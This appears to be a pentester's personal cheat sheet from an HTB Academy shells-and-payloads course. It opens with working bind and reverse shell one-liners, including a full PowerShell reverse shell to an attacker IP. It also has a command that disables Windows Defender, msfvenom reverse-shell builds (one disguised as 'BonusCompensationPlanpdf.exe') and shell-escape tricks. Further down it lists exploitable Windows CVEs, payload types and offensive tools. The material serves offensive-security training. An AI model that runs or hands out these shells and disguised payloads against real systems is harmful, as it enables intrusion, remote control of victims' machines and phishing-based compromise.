**Bind**
	rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <IP> <PORT> > /tmp/f
	nc -nv 10.129.41.200 4444
**Rev**
	 Set-MpPreference -DisableRealtimeMonitoring $true
		powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.43',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


xfreerdp +clipboard /v:10.129.x.x /u:htb-student /p:HTB_@cademy_stdnt!

msfvenom -l
	 linux/x86/shell/reverse_tcp
	msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
	
	msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe


python -c 'import pty; pty.spawn("/bin/sh")' 
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
awk 'BEGIN {system("/bin/sh")}'
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find . -exec /bin/sh \; -quit
vim -c ':!/bin/sh'
vim
	:set shell=/bin/sh
	:shell





https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://www.cvedetails.com/vendor/26/Microsoft.html

`MS08-067`

MS08-067 was a critical patch pushed out to many different Windows revisions due to an SMB flaw. This flaw made it extremely easy to infiltrate a Windows host. It was so efficient that the Conficker worm was using it to infect every vulnerable host it came across. Even Stuxnet took advantage of this vulnerability.

`Eternal Blue`

MS17-010 is an exploit leaked in the Shadow Brokers dump from the NSA. This exploit was most notably used in the WannaCry ransomware and NotPetya cyber attacks. This attack took advantage of a flaw in the SMB v1 protocol allowing for code execution. EternalBlue is believed to have infected upwards of 200,000 hosts just in 2017 and is still a common way to find access into a vulnerable Windows host.

`PrintNightmare`

A remote code execution vulnerability in the Windows Print Spooler. With valid credentials for that host or a low privilege shell, you can install a printer, add a driver that runs for you, and grants you system-level access to the host. This vulnerability has been ravaging companies through 2021. 0xdf wrote an awesome post on it [here](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html).

`BlueKeep`

CVE 2019-0708 is a vulnerability in Microsoft's RDP protocol that allows for Remote Code Execution. This vulnerability took advantage of a miss-called channel to gain code execution, affecting every Windows revision from Windows 2000 to Server 2008 R2.

`Sigred`

CVE 2020-1350 utilized a flaw in how DNS reads SIG resource records. It is a bit more complicated than the other exploits on this list, but if done correctly, it will give the attacker Domain Admin privileges since it will affect the domain's DNS server which is commonly the primary Domain Controller.

`SeriousSam`

CVE 2021-36924 exploits an issue with the way Windows handles permission on the `C:\Windows\system32\config` folder. Before fixing the issue, non-elevated users have access to the SAM database, among other files. This is not a huge issue since the files can't be accessed while in use by the pc, but this gets dangerous when looking at volume shadow copy backups. These same privilege mistakes exist on the backup files as well, allowing an attacker to read the SAM database, dumping credentials.

`Zerologon`

CVE 2020-1472 is a critical vulnerability that exploits a cryptographic flaw in Microsoft’s Active Directory Netlogon Remote Protocol (MS-NRPC). It allows users to log on to servers using NT LAN Manager (NTLM) and even send account changes via the protocol. The attack can be a bit complex, but it is trivial to execute since an attacker would have to make around 256 guesses at a computer account password before finding what they need. This can happen in a matter of a few seconds.

#### Payload Types to Consider

-   [DLLs](https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/dynamic-link-library) A Dynamic Linking Library (DLL) is a library file used in Microsoft operating systems to provide shared code and data that can be used by many different programs at once. These files are modular and allow us to have applications that are more dynamic and easier to update. As a pentester, injecting a malicious DLL or hijacking a vulnerable library on the host can elevate our privileges to SYSTEM and/or bypass User Account Controls.
    
-   [Batch](https://commandwindows.com/batch.htm) Batch files are text-based DOS scripts utilized by system administrators to complete multiple tasks through the command-line interpreter. These files end with an extension of `.bat`. We can use batch files to run commands on the host in an automated fashion. For example, we can have a batch file open a port on the host, or connect back to our attacking box. Once that is done, it can then perform basic enumeration steps and feed us info back over the open port.
    
-   [VBS](https://www.guru99.com/introduction-to-vbscript.html) VBScript is a lightweight scripting language based on Microsoft's Visual Basic. It is typically used as a client-side scripting language in webservers to enable dynamic web pages. VBS is dated and disabled by most modern web browsers but lives on in the context of Phishing and other attacks aimed at having users perform an action such as enabling the loading of Macros in an excel document or clicking on a cell to have the Windows scripting engine execute a piece of code.
    
-   [MSI](https://docs.microsoft.com/en-us/windows/win32/msi/windows-installer-file-extensions) `.MSI` files serve as an installation database for the Windows Installer. When attempting to install a new application, the installer will look for the .msi file to understand all of the components required and how to find them. We can use the Windows Installer by crafting a payload as an .msi file. Once we have it on the host, we can run `msiexec` to execute our file, which will provide us with further access, such as an elevated reverse shell.
    
-   [Powershell](https://docs.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7.1) Powershell is both a shell environment and scripting language. It serves as Microsoft's modern shell environment in their operating systems. As a scripting language, it is a dynamic language based on the .NET Common Language Runtime that, like its shell component, takes input and output as .NET objects. PowerShell can provide us with a plethora of options when it comes to gaining a shell and execution on a host, among many other steps in our penetration testing process.

**Resource**

**Description**

`MSFVenom & Metasploit-Framework`

[Source](https://github.com/rapid7/metasploit-framework) MSF is an extremely versatile tool for any pentester's toolkit. It serves as a way to enumerate hosts, generate payloads, utilize public and custom exploits, and perform post-exploitation actions once on the host. Think of it as a swiss-army knife.

`Payloads All The Things`

[Source](https://github.com/swisskyrepo/PayloadsAllTheThings) Here, you can find many different resources and cheat sheets for payload generation and general methodology.

`Mythic C2 Framework`

[Source](https://github.com/its-a-feature/Mythic) The Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation.

`Nishang`

[Source](https://github.com/samratashok/nishang) Nishang is a framework collection of Offensive PowerShell implants and scripts. It includes many utilities that can be useful to any pentester.

`Darkarmour`

[Source](https://github.com/bats3c/darkarmour) Darkarmour is a tool to generate and utilize obfuscated binaries for use against Windows hosts.


#### Payload Transfer and Execution:

Besides the vectors of web-drive-by, phishing emails, or dead drops, Windows hosts can provide us with several other avenues of payload delivery. The list below includes some helpful tools and protocols for use while attempting to drop a payload on a target.

-   `Impacket`: [Impacket](https://github.com/SecureAuthCorp/impacket) is a toolset built-in Python that provides us a way to interact with network protocols directly. Some of the most exciting tools we care about in Impacket deal with `psexec`, `smbclient`, `wmi`, Kerberos, and the ability to stand up an SMB server.
-   [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md): is a great resource to find quick oneliners to help transfer files across hosts expediently.
-   `SMB`: SMB can provide an easy to exploit route to transfer files between hosts. This can be especially useful when the victim hosts are domain joined and utilize shares to host data. We, as attackers, can use these SMB file shares along with C$ and admin$ to host and transfer our payloads and even exfiltrate data over the links.
-   `Remote execution via MSF`: Built into many of the exploit modules in Metasploit is a function that will build, stage, and execute the payloads automatically.
-   `Other Protocols`: When looking at a host, protocols such as FTP, TFTP, HTTP/S, and more can provide you with a way to upload files to the host. Enumerate and pay attention to the functions that are open and available for use.